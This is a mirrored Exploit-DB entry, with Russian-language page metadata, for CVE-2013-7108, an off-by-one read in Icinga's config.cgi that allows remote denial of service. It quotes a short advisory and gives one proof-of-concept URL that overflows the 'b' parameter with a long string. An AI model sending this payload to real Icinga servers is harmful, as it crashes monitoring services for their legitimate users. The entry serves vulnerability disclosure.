- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38882
- Проверка EDB
-
- Пройдено
- Автор
- DTAG GROUP INFORMATION SECURITY
- Тип уязвимости
- DOS
- Платформа
- CGI
- CVE
- cve-2013-7108
- Дата публикации
- 2013-12-16
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service
Код:
source: https://www.securityfocus.com/bid/64363/info
Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition.
Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users.
http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times]
- Источник
- www.exploit-db.com